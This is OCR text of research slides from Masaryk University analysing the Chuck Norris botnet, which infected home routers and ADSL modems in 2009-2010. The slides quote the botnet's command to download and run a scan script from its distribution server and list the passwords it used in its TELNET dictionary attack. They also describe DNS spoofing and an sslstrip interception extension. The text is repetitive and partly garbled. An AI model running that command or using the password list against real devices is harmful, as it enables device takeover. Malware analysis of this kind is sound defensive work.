Embedded Malware - An Analysis of the Chuck Norris Botnet P. Čeleda, R. Krejčí, J. Vykopal, M. Drašar {celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz iW|) ®csiKr-MU (El Part I Botnet Discovery P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 2/25 o Client-side anti-* protection is used and well known. o Client-side anti-* protection is used and well known, o What could happen if we attack infrastructure? FlowMon probe FlowMon probe FlowMon probe Net Flow data generation FlowMon probe NetFlow data generation NetFlow data collection probe NetFlow data generation NetFlow data collection NetFlow data analyses o Worldwide TELNET scan attempts. o Mostly comming from ADSL connections. h;can; demoplugin u;can; sshattack p2pdetect dos smiirf Event; | Sh=.*,.rt. || Show >» ».».«„„.„», | Alerts Time * Protocol* Source IP * Destination IPs * Destination Ports * Severity* Operations * 2009-12-14 00:04:18.244 TCP 190.43.54.116 O 147 2009-12-14 00:04:26.379 147 147 147 251 251 251 251 52 52 52 52 1, 147.25 12, 147.2 23, 147.2 28 and o 1.52.10, 147.251.52.11, 23 0 | Ful RopOlt 51.52.13, 147.251.52.22, 51.52.26, 147.251.52.27, her 43 IPs 2009-12-14 00:04:18.253 TCP 190.43.54.116 O 147 2009-12-14 00:04:29.356 147 147 147 251 251 251 251 52 52 52 52 2, 147.25 5, 147.25 8, 147.25 1.52.3, 147.251.52.4, 23 0 1 Ful Report 1.52.6, 147.251.52.7, 1.52.9, 147.251.52.15, her 188 IPs 2009-12-14 00:08:13.738 TCP 87.16.90.222 O 147 2009-12-14 00:08:21.863 147 147 147 251 251 251 251 94 94 94 94 1, 147.25 4, 147.2E 7, 147.25 10 and o 1.94.2,147.251.94.3, 23 0 | Ful Report 1.94.5, 147.251.94.6, 1.94.8, 147.251.94.9, her 237 IPs 2009-12-14 00:16:11.771 TCP 122.160.7.65 O 147 2009-12-14 00:16:11.802 147 147 147 251 2:51 251 251 0.1, 147.251 0.4, 147.251 0.7, 147.251 0.10 and ot 0.2, 147.251.0.3, 22 o f~Ful Report 0.5, 147.251.0.6, 0.8, 147.251.0.9, er 102 IPs 2009-12-14 00:14:36.584 TCP 190.232.138.125 © 147 2009-12-14 00:14:51.047 147 147 147 251 251 251 251 64.1, 147.25 64.4, 147.25 64.7, 147.25 64.10 and o 1.64.2,147.251.64.3, 23 0 | Ful Report 1.64.5, 147.251.64.6, 1.64.8, 147.251.64.9, her 241 IPs Part II Chuck Norris Botnet P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 7/25 Chuck Norris Botnet in a Nutshell o Linux malware - IRC bots with central C&C servers. 0 Attacks poorly-configured Linux MIPSEL devices, o Vulnerable devices - ADSL modems and routers. o Uses TELNET brute force attack as infection vector, o Users are not aware about the malicious activities, o Missing anti-malware solution to detect it. Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code [R] anger Killato : in nome di Chuck Norris ! P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 8/25 Monitoring of the Botnet P. Čeleda et al Botnet infiltration used from 12/2009 to 02/2010. Embedded Malware - An Analysis of the Chuck Norris Botnet 9/25 Botnet infiltration used from 12/2009 to 02/2010. Botnet infiltration used from 12/2009 to 02/2010 ASUS WL-500gP (agent-provocateur) Botnet infiltration used from 12/2009 to 02/2010. ASUS WL-500gP (agent-provocateur) Botnet infiltration used from 12/2009 to 02/2010. infected device 11 list of C class networks to scan IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Table 1: Example of botnet propagation targets. IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Table 1: Example of botnet propagation targets. IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Table 1: Example of botnet propagation targets. infected device victim TELNET service dictionary attack infected victim device admin, Admin, password, root, 1234, private, XAlbacOMX, adsll234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password Table 2: Passwords used for a dictionary attack. TELNET service download current bot version dictionary attack -► infected victim device admin, Admin, password, root, 1234, private, XAlbacOMX, adsll234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password Table 2: Passwords used for a dictionary attack. bat deny remote access (ports 22-80) infected device deny remote access (ports 22-80) infected device J^S®5 2. Topic: !* init-cmd l| I server (get scan-tools) infected device Initial Command (IRC Topic): :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh Initial Command (IRC Topic): :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh Botnet Threats o Denial-of-Service attacks - DoS, DDoS. o DNS spoofing attack. o Infected device reconfiguration. t < Consequences for Users o The link was saturated with malicious traffic activities. o Economic losses and criminal sanctions against unaware users. DNS Spoofing Attack o Web page redirect: o www.facebook.com o www.google.com o Malicious code execution. t 1 primary secondary DNS server , DNS server infected router DNS Spoofing Attack o Web page redirect: o www.facebook.com o www.google.com o Malicious code execution. botnet C&C Center OpenDNS.com t 1 primary secondary DNS server , DNS server www.facebool DNS Spoofing Attack o Web page redirect: o www.facebook.com o www.google.com o Malicious code execution. botnet C&C Center OpenDNS.com DNS Spoofing Attack o Web page redirect: o www.facebook.com o www.google.com o Malicious code execution. botnet C&C Center OpenDNS.com www.linux.org Botnet Size and Evaluation - I o Size estimation based on NetFlow data from Masaryk University. o 33000 unique attackers (infected devices) from 10/2009 - 02/2010. Most Infected ISPs Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network Mat 1 Apt i Unique attackers targeting the MU network Month Min Max Avr Mdn October 0 854 502 621 November 41 628 241 136 December 69 1321 366 325 January 9 1467 312 137 February 180 2004 670 560 Total 0 2004 414 354 Botnet stopped activity on 23 February 2010. P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 15 / 25 Botnet Size and Evaluation - I o Size estimation based on NetFlow data from Masaryk University. o 33000 unique attackers (infected devices) from 10/2009 - 02/2010. Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mat 1 Apt 1 Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network Unique attackers targeting the MU network Month Min Max Avr Mdn October 0 854 502 621 November 41 628 241 136 December 69 1321 366 325 January 9 1467 312 137 February 180 2004 670 560 Total 0 2004 414 354 Botnet stopped activity on 23 February 2010. P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 15 / 25 Botnet Size and Evaluation - I o Size estimation based on NetFlow data from Masaryk University. o 33000 unique attackers (infected devices) from 10/2009 - 02/2010. Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mat 1 Apt 1 Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network Unique attackers targeting the MU network Month Min Max Avr Mdn October 0 854 502 621 November 41 628 241 136 December 69 1321 366 325 January 9 1467 312 137 February 180 2004 670 560 Total 0 2004 414 354 Botnet stopped activity on 23 February 2010. P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 15 / 25 Botnet Size and Evaluation - II P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 16 / 25 TELNET Malware Activities - 2009/11 - 2011/7 P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 17 / 25 Chuck Norris Will Never Die or Cyber War ? P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 18 / 25 ADSL Modem Tuning - Botnet Distribution Site P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 19 / 25 Part III Beoynd Chuck Norris Botnet P. Celeda et al. Embedded Ma I ware - An Analysis of the Chuck Norris Botnet 20 / 25 Attacks on HTTPS using Chuck Norris Botnet - I Features o Our extension to Chuck Norris Botnet. o Based on MITM (Man-ln-The-Middle) attack presented by Moxie Marlinspike at Black Hat DC (02/2009). o Infected host operates as transparent HTTP proxy. o We don't attack HTTPS directly (invalid certificates). Vulnerable Systems o Any site providing HTTP —> HTTPS redirect, o Can't be detected on web server side, o No invalid certificates on client side. P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 21 / 25 web service https://mail.google.com access point (mitm - sslstrip) user 8 6.49.xxx.yyy MITM attack using sslstrip tool and infected host. web service access point user s://mail.google.com (mitm - Sslstrip) 86.49.xxx. GET HTTP mail.google.com MITM attack using sslstrip tool and infected host. web service access point user https://mail.google.com (mitm - Sslstrip) 86 .49 . xxx .yyy GET HTTP mail.google.com HTTP 301 Moved Perm; https://mail.google.c (0,0) m http://mail.google.com MITM attack using sslstrip tool and infected host. web service access point user https://mail.google.com (mitm - Sslstrip) 86 .49 . xxx .yyy GET HTTP mail.google.com HTTP 301 Moved Perm; https://mail.google.c ■<- (0,0) m http://mail.google.com ^ ,~fg£2 HTTP mail.google.com SSL mail.google. MITM attack using sslstrip tool and infected host. web service access point user https://mail.google.com (mitm - Sslstrip) 86 .49 . xxx .yyy GET HTTP mail.google.com „™_ ((«,»)) _ https://mail.google.com http://mail.google.com ^H^^ GET HTTP mail.google.com SSL mail.google.com Client hello ' GET HTTP mail.google. SSL Server hello _ HTTP 200 OK MITM attack using sslstrip tool and infected host. Part IV Conclusion P. Celeda et al. Embedded Ma I ware - An Analysis of the Chuck Norris Botnet 23 / 25 Conclusion Botnet Timeline o Compilation timestamp in pnscan tool - 4.7.2008. o First file uploaded to distribution servers - 19.5.2009. o Botnet discovery at Masaryk University - 2.12.2009. a Botnet shutdown (hibernation) - 23.2.2010 Botnet Summary o There are not anti-* solutions for embedded/SoHo devices, o Based on known techniques and components from Internet, o Users are not aware about the attack or device infection, o No response and collaboration from infected networks. P. Celeda et al. Embedded Malware - An Analysis of the Chuck Norris Botnet 24 / 25 Pavel Celeda et al. celeda@ics.muni.cz Project CYBER http://www.muni.cz/ics/cyber Embedded Malware - An Analysis of the Chuck Norris Botnet